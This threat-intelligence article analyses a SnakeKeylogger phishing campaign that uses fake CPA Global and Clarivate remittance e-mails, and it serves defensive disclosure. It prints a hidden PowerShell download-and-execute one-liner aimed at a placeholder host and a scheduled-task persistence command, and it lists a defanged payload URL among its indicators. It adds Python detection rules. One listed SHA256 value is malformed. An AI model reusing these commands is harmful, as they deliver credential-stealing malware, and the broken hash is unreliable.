A newly observed information‐stealing campaign is deploying a stealthy variant of the SnakeKeylogger malware via weaponized e-mails that masquerade as legitimate remittance advice from CPA Global and Clarivate.
Researchers first identified the infection vector on October 7, 2025, when recipients received messages titled “remittance advice for the payment dated 07‐Oct‐2025,” urging them to download an attached ISO or ZIP file containing a malicious BAT script.
Analysis reveals that the malware leverages embedded PowerShell commands to fetch the SnakeKeylogger payload, execute it, and exfiltrate harvested credentials to attacker‐controlled infrastructure.
The campaign’s social engineering revolves around spoofed sender aliases such as “CPA‐Payment Files” and display names referencing CPA Global or Clarivate, lending false legitimacy to the phishing lure.
The e-mails contain brief text asking recipients to review the attached payment advice, accompanied by an image mimicking a corporate letterhead.
The malicious attachment is delivered as either an ISO image or a compressed ZIP archive, both of which contain a single BAT script. When executed, this script silently invokes a sequence of PowerShell commands that download and run the SnakeKeylogger implant from a remote server.

The use of ISO containers helps the campaign bypass simple ZIP‐only scanning policies, while the dual‐stage architecture complicates detection.
PowerShell-Based Deployment
Upon user interaction with the attachment, the BAT script executes a PowerShell one-liner similar to the following:

```powershell
@echo off
powershell -NoProfile -WindowStyle Hidden -Command "$u='http://malicious[.]domain/loader.exe';$p='$env:TEMP\update.exe';Invoke-WebRequest -Uri $u -OutFile $p;Start-Process $p"
```

This command instructs PowerShell to download the SnakeKeylogger executable (loader.exe) to a temporary directory and launch it.
The hidden window style ensures minimal visual indicators. Once executed, SnakeKeylogger hooks into browser processes and keylogging APIs to capture credentials and session tokens.
The malware packs its core functionality into a lightweight executable under 800 KB, enabling rapid download and execution.
Researchers observed that the payload uses Windows API calls to inject into legitimate processes such as explorer.exe or svchost.exe, further evading endpoint protection solutions.
Data Exfiltration and Persistence Mechanisms
After harvesting keystrokes and clipboard data, SnakeKeylogger compresses the logs and exfiltrates them over HTTP POST requests to a command‐and‐control endpoint hosted on a compromised web server.
The exfiltration traffic appears legitimate due to the use of standard HTTP user-agents and base64 encoding of the exfiltrated data. The malware achieves persistence by creating a scheduled task named "SysUpdate" that triggers every hour:

```powershell
schtasks /Create /TN "SysUpdate" /TR "%TEMP%\update.exe" /SC HOURLY /F
```
This ensures that even if the process is terminated, it will relaunch automatically. Analysts also discovered that the threat actor registered multiple subdomains for fallback connectivity, enabling high availability of the C2 infrastructure.
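The two behaviours described above (the hidden PowerShell download-and-run one-liner, and the hourly scheduled task whose action lives in %TEMP%) are both visible in process-creation telemetry. The following is an added example, not code from the original article, that hunts for both patterns over constructed sample records; the image/command-line tuple shape, the sample URL and the rule names are assumptions for the example.

```python
import re

# Constructed sample records (image, command line) in the style of a
# process-creation export. The URL and paths are made up for the example; the
# flag combination and the "SysUpdate" task name come from the article.
SAMPLE_EVENTS = [
    ("powershell.exe",
     'powershell -NoProfile -WindowStyle Hidden -Command "$u=\'http://example.invalid/loader.exe\';'
     '$p=\'$env:TEMP\\update.exe\';Invoke-WebRequest -Uri $u -OutFile $p;Start-Process $p"'),
    ("schtasks.exe",
     'schtasks /Create /TN "SysUpdate" /TR "%TEMP%\\update.exe" /SC HOURLY /F'),
    ("powershell.exe",
     'powershell -NoProfile -Command "Get-ChildItem C:\\Users"'),
    ("schtasks.exe",
     'schtasks /Create /TN "Backup" /TR "C:\\Program Files\\Backup\\run.exe" /SC DAILY'),
]

HIDDEN_FLAGS = ("-windowstyle hidden", "-w hidden")
# Paths that resolve into the user's temp directory, in cmd and PowerShell spelling.
TEMP_PATH = re.compile(r"(%temp%|\$env:temp|\\appdata\\local\\temp)")

def classify(image, cmdline):
    """Return the names of the rules that fire for one process-creation record."""
    hits = []
    low = cmdline.lower()
    if image.lower() == "powershell.exe":
        hidden = any(flag in low for flag in HIDDEN_FLAGS)
        downloads = "invoke-webrequest" in low or "downloadfile" in low
        runs_from_temp = "start-process" in low and TEMP_PATH.search(low) is not None
        if hidden and downloads and runs_from_temp:
            hits.append("ps_hidden_download_and_exec_from_temp")
    if image.lower() == "schtasks.exe" and "/create" in low:
        action = re.search(r'/tr\s+"?([^"]+)"?', low)
        if action and TEMP_PATH.search(action.group(1)):
            hits.append("schtasks_action_in_temp")
        if re.search(r'/tn\s+"?sysupdate"?', low):
            hits.append("schtasks_name_sysupdate")
    return hits

def scan(events):
    """Map each flagged command line to its rule hits; clean records are dropped."""
    flagged = {}
    for image, cmdline in events:
        hits = classify(image, cmdline)
        if hits:
            flagged[cmdline] = hits
    return flagged
```

The task-name rule is campaign-specific and will age quickly; the two path-based rules capture the underlying behaviour and are the ones worth keeping.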
The SnakeKeylogger campaign demonstrates how simple social engineering, combined with built-in Windows tools like PowerShell, can facilitate stealthy credential theft at scale.
Organizations should reinforce user awareness on scrutinizing payment‐related e-mails, implement robust attachment‐sandboxing policies, and employ behavior-based detection to catch malicious process injection and data exfiltration activities.
Enhanced logging of scheduled tasks and network egress points will be critical to identifying and disrupting this threat before sensitive data is compromised.
Indicators of Compromise
Security teams should monitor for the following IoCs to detect and mitigate this campaign:
| Indicator Type | Value |
|---|---|
| Malicious domain | malicious.domain |
| SHA256 (loader.exe) | 9f3c2a5b4d6e8f12c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8 |
| Scheduled task name | SysUpdate |
| PowerShell one-liner flags | -NoProfile -WindowStyle Hidden -Command |
| Phishing sender alias | CPA-Payment Files |
Security teams are advised to block the identified domains, hash values, and scheduled tasks at the perimeter and endpoint layers.
| SHA256 Hash | File Type | Description | Additional Details |
|---|---|---|---|
| 1bf2e282e0b58814838af57c8792b6147eacedb3f954821b8eea3b79e1f77cb3 | ZIP (mail attachment) | Malicious archive file | Delivered as an email attachment |
| fb17cc142e92edd5c683c3d53ff8e15f73c67b65df116827f92c9f81c672ec26 | ISO (mail attachment) | Malicious disk image | Delivered as an email attachment |
| 929fc6575e8ca6b7a657c784254693c4a343e0576bc64a8ba42eac5003796e68 | BAT (downloader) | Batch script downloader | Downloads a PowerShell script from the URL below |
| N/A | PS script URL | PowerShell script downloaded by the BAT | hxxp://fxa[.]sabitaxt[.]com/mc55tP.ps1 |
Email filtering solutions should enforce stricter ISO file inspection and flag any e-mails containing PowerShell commands within attachments. Endpoint protection platforms must be tuned to detect anomalous process injection and unsanctioned scheduled tasks.